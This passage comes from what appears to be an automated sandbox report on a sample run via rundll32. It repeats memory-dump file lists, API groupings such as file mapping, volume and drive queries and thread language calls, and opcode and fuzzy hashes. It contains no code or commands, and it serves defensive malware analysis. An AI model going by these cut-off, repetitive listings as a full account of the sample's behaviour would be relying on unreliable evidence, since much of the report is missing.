                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AddressHandleInformationLogicalModuleProcProcessor
                          • String ID: GetLogicalProcessorInformation$kernel32.dll
                          • API String ID: 4292003513-812649623
                          • Opcode ID: a3b137bb38b964c4aad35ffd3a75304e133271fe787b705fcb47eb8fb69c2827
                          • Instruction ID: cef72fbf3f936fea3f355e027997f123dbf00725f42591d7e77524adb724cd90
                          • Opcode Fuzzy Hash: a3b137bb38b964c4aad35ffd3a75304e133271fe787b705fcb47eb8fb69c2827
                          • Instruction Fuzzy Hash: 6A213A72A016108DDB54EFB5D58139E3760EB0079CF11242BFA0E27B99DB7AC8C9C788
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: File$View$CloseCreateCurrentHandleMappingProcessUnmap
                          • String ID:
                          • API String ID: 3559396350-0
                          • Opcode ID: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction ID: 8e748d1b53e11ccef3c0eb3844b99e526bf8a27556ab0dbc5ec00e588de23727
                          • Opcode Fuzzy Hash: c1b8913223bb6d67ca11dac591130d17c9fbfe597173d1045ad4f9b4300826e1
                          • Instruction Fuzzy Hash: 05510576201BC0C9EB70EF36D8997DE2761E75578CF80511AEA494BB99CFB8C684C384
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: ErrorFileLast$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 1269242970-0
                          • Opcode ID: 9536fcacba14ebfa071a3de4df2a683843a657af3e0c86f99e02428926cb4329
                          • Instruction ID: 39fea05b0fdc2f25c8a20a9dd337e5d150ca42227ecdd6d49064eb7cb99fe5a3
                          • Opcode Fuzzy Hash: 9536fcacba14ebfa071a3de4df2a683843a657af3e0c86f99e02428926cb4329
                          • Instruction Fuzzy Hash: F2412932200B848DD760EF79E8653DA37A5F78579CF10821AEA9D4BB9ACF38C554D380
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesErrorFileLast
                          • String ID:
                          • API String ID: 1799206407-0
                          • Opcode ID: 8ab163486b0a053c2a7d456d2aea00ace8804d18e54ae64613c8b82fc606183d
                          • Instruction ID: c5a4fe3489037ea804c00f5422208fa66f2308ca377aeb35cea8b5e0c8ade501
                          • Opcode Fuzzy Hash: 8ab163486b0a053c2a7d456d2aea00ace8804d18e54ae64613c8b82fc606183d
                          • Instruction Fuzzy Hash: 39117AB120410320EE28693756243BB09024F8D3F8F2AB627EE6A873E4C63CC4469E1D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetThreadUILanguage.KERNEL32 ref: 004145B9
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 00414634
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146A0
                          • SetThreadPreferredUILanguages.KERNEL32 ref: 004146E0
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 00414565
                            • Part of subcall function 00414540: GetThreadPreferredUILanguages.KERNEL32 ref: 0041458E
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: Thread$LanguagesPreferred$Language
                          • String ID:
                          • API String ID: 2255706666-0
                          • Opcode ID: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction ID: 57eada3b38194d7b08bb3a3721538a05868af864e37c8cd442cfa6c9d7bf3455
                          • Opcode Fuzzy Hash: 2b226cebd2c2f178f8fb8eecb07d43c99173cca05a335e053b410a15d8c7619d
                          • Instruction Fuzzy Hash: 0F31B0723015609ADB58DF36DA543EA2762EB84BDCF446126FA0A47B58EF7CC8C5C344
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                          • GetVolumeInformationW.KERNEL32 ref: 0043657C
                          • GetDriveTypeW.KERNEL32 ref: 004365D7
                            • Part of subcall function 00436880: GetFileAttributesW.KERNEL32 ref: 0043689F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835056539.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835080931.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835102427.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835130290.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835159842.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835182375.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835208804.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835229027.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835250097.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835274302.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835296581.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835324920.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835348490.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835371925.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835395113.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835419080.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835445732.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835469362.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835491284.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835512740.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835534280.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835557834.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835581446.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835601222.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835622757.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835664120.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835686448.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835712135.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835732634.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835752736.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835773238.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835792641.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_400000_rundll32.jbxd
                          Similarity
                          • API ID: AttributesFile$DriveInformationTypeVolume
                          • String ID: 8dC
                          • API String ID: 2660071179-998101939
                          • Opcode ID: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction ID: 486f2d80f4d3eed2484e1266edd3e8425bc97c3940d013daab9ec3d1af7560df
                          • Opcode Fuzzy Hash: 03753d152c315a0f9aa2bccae41360c27fd1b09a45320341c8c03d75ba66dd4c
                          • Instruction Fuzzy Hash: 2F519F72205A81DDDB20DF36D8923E92B65F74578CF549026EE8987B5ACF3EC248C358
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.1834420307.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000003.00000002.1834394870.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834420307.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834882459.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834916911.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834945984.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834967802.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1834994415.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.1835028004.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
